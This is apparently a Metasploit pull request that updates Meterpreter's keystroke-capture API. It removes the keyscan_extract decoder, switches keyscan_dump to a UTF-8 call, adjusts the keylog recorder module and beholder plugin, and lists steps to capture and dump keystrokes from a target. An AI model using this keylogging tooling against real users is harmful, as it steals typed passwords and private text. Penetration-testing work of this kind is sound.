### PR TITLE
Update modules calling Meterpreter keyscan API

### DIFF
--- a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
@@ -226,41 +226,9 @@ class UI < Rex::Post::UI
   # Dump the keystroke buffer
   #
   def keyscan_dump
-    request  = Packet.create_request('stdapi_ui_get_keys')
+    request  = Packet.create_request('stdapi_ui_get_keys_utf8')
     response = client.send_request(request)
     return response.get_tlv_value(TLV_TYPE_KEYS_DUMP);
-  end
-
-  #
-  # Extract the keystroke from the buffer data
-  #
-  def keyscan_extract(buffer_data)
-    outp = ""
-    buffer_data.unpack("n*").each do |inp|
-      fl = (inp & 0xff00) >> 8
-      vk = (inp & 0xff)
-      kc = VirtualKeyCodes[vk]
-
-      f_shift = fl & (1<<1)
-      f_ctrl  = fl & (1<<2)
-      f_alt   = fl & (1<<3)
-
-      if(kc)
-        name = ((f_shift != 0 and kc.length > 1) ? kc[1] : kc[0])
-        case name
-        when /^.$/
-          outp << name
-        when /shift|click/i
-        when 'Space'
-          outp << " "
-        else
-          outp << " <#{name}> "
-        end
-      else
-        outp << " <0x%.2x> " % vk
-      end
-    end
-    return outp
   end
 
 protected

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
@@ -39,7 +39,7 @@ class Console::CommandDispatcher::Stdapi::Ui
       "enumdesktops"  => [ "stdapi_ui_desktop_enum" ],
       "getdesktop"    => [ "stdapi_ui_desktop_get" ],
       "idletime"      => [ "stdapi_ui_get_idle_time" ],
-      "keyscan_dump"  => [ "stdapi_ui_get_keys" ],
+      "keyscan_dump"  => [ "stdapi_ui_get_keys_utf8" ],
       "keyscan_start" => [ "stdapi_ui_start_keyscan" ],
       "keyscan_stop"  => [ "stdapi_ui_stop_keyscan" ],
       "screenshot"    => [ "stdapi_ui_desktop_screenshot" ],

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
@@ -313,7 +313,7 @@ class Console::CommandDispatcher::Stdapi::Ui
   def cmd_keyscan_dump(*args)
     print_line("Dumping captured keystrokes...")
     data = client.ui.keyscan_dump
-    print_line(client.ui.keyscan_extract(data))
+    print_line(data)
 
     return true
   end

--- a/modules/post/windows/capture/keylog_recorder.rb
+++ b/modules/post/windows/capture/keylog_recorder.rb
@@ -243,7 +243,7 @@ class MetasploitModule < Msf::Post
   #
   # @return [void] A useful return value is not expected here
   def write_keylog_data
-    output = session.ui.keyscan_extract(session.ui.keyscan_dump)
+    output = session.ui.keyscan_dump
 
     if not output.empty?
       print_good("Keystrokes captured #{output}") if datastore['ShowKeystrokes']

--- a/plugins/beholder.rb
+++ b/plugins/beholder.rb
@@ -127,7 +127,7 @@ class Plugin::Beholder < Msf::Plugin
         return
       end
 
-      collected_keys = sess.ui.keyscan_extract(sess.ui.keyscan_dump)
+      collected_keys = sess.ui.keyscan_dump
       store_keystrokes(sid, collected_keys)
     end
 


### PR DESCRIPTION
This updates all modules which call the stdapi extension keyscan API's.  `keyscan_extract ` has been removed and all modules calling it have been modified.  The corresponding payloads PR can be found [here](https://github.com/rapid7/metasploit-payloads/pull/185).  

I consider this a WIP and I'd be interested in opinions on whether the process/timestamp stuff is too busy or what not.

## Verification

- [x] Build the code from [https://github.com/rapid7/metasploit-payloads/pull/185](https://github.com/rapid7/metasploit-payloads/pull/185)
- [x] Throw the resulting `ext_server_stdapi.xXX.dll` into data/meterpreter/
- [x] Get a Meterpreter session going on your target and interact with it 
- [x] `keyscan_start`
- [x] For testing purposes, make sure you get the warning about your local stdapi DLL file being used 
- [x] Type a lot of stuff on the target
- [x] Back on your host, run `keyscan_dump`
- [x] **Verify** that it returns the stuff you typed
- [x] **Verify** that it correctly logs the application that was in focus and the time the typing started
- [x] Return to the target, switch applications, and type more stuff
- [x] run `keyscan_dump` on your host again
- [x] **Verify** that it returns what you typed and notated the new application in focus


